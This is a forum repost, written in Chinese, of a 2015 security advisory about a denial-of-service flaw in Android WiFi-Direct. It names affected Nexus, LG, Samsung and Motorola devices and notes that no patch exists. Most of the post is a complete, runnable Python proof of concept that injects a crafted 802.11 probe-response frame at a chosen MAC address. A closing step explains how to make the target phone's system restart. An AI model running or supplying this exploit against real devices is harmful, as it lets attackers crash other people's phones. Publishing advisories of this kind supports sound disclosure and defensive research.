[CORE-2015-0002] - 安卓Wifi直连拒绝服务漏洞

admin

[CORE-2015-0002] - Android WiFi-Direct Denial of Service
http://seclists.org/fulldisclosure/2015/Jan/104

部分安卓设备在搜索Wifi直连设备时可遭受拒绝服务攻击

攻击者可以发送一个精心构造的802.11响应信号帧 使Dalvik子系统由于WiFiMonitor类中未捕获的异常而重启

受影响设备版本：
   . Nexus 5 - Android 4.4.4
   . Nexus 4 - Android 4.4.4
   . LG D806 - Android 4.2.2
   . Samsung SM-T310 - Android 4.2.2
   . Motorola RAZR HD - Android 4.1.2

在4.4.4系统上复现成功

由于安卓官方回应“该漏洞影响较小，没有时间修复”，目前该漏洞没有任何补丁

POC：

1. #!/usr/bin/env python
   
2. 
   
3. import sys
   
4. import time
   
5. import struct
   
6. import PyLorcon2
   
7. 
   
8. 
   
9. def get_probe_response(source, destination, channel):
   
10.   frame = str()
    
11.   frame += "\x50\x00"  # Frame Control
    
12.   frame += "\x00\x00"  # Duration
    
13.   frame += destination
    
14.   frame += source
    
15.   frame += source
    
16.   frame += "\x00\x00"  # Sequence Control
    
17.   frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
    
18.   frame += "\x64\x00"  # Beacon Interval
    
19.   frame += "\x30\x04"  # Capabilities Information
    
20. 
    
21.   # SSID IE
    
22.   frame += "\x00"
    
23.   frame += "\x07"
    
24.   frame += "DIRECT-"
    
25. 
    
26.   # Supported Rates
    
27.   frame += "\x01"
    
28.   frame += "\x08"
    
29.   frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    
30. 
    
31.   # DS Parameter Set
    
32.   frame += "\x03"
    
33.   frame += "\x01"
    
34.   frame += struct.pack("B", channel)
    
35. 
    
36.   # P2P
    
37.   frame += "\xDD"
    
38.   frame += "\x27"
    
39.   frame += "\x50\x6F\x9A"
    
40.   frame += "\x09"
    
41.   # P2P Capabilities
    
42.   frame += "\x02" # ID
    
43.   frame += "\x02\x00" # Length
    
44.   frame += "\x21\x00"
    
45.   # P2P Device Info
    
46.   frame += "\x0D" # ID
    
47.   frame += "\x1B\x00" # Length
    
48.   frame += source
    
49.   frame += "\x01\x88"
    
50.   frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
    
51.   frame += "\x00"
    
52.   frame += "\x10\x11"
    
53.   frame += "\x00\x06"
    
54.   frame += "fafa\xFA\xFA"
    
55. 
    
56.   return frame
    
57. 
    
58. 
    
59. def str_to_mac(address):
    
60.   return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
    
61. 
    
62. 
    
63. if __name__ == "__main__":
    
64.   if len(sys.argv) != 3:
    
65.     print "Usage:"
    
66.     print "  poc.py <iface> <target>"
    
67.     print "Example:"
    
68.     print "  poc.py wlan0 00:11:22:33:44:55"
    
69.     sys.exit(-1)
    
70. 
    
71.   iface = sys.argv[1]
    
72.   destination = str_to_mac(sys.argv[2])
    
73. 
    
74.   context = PyLorcon2.Context(iface)
    
75.   context.open_injmon()
    
76. 
    
77.   channel = 1
    
78.   source = str_to_mac("00:11:22:33:44:55")
    
79.   frame = get_probe_response(source, destination, channel)
    
80. 
    
81.   print "Injecting PoC."
    
82.   for i in range(100):
    
83.     context.send_bytes(frame)
    
84.     time.sleep(0.100)
    

复制代码

运行poc，在 设置-wlan-右下按钮wlan直连-搜索设备时触发漏洞，系统重启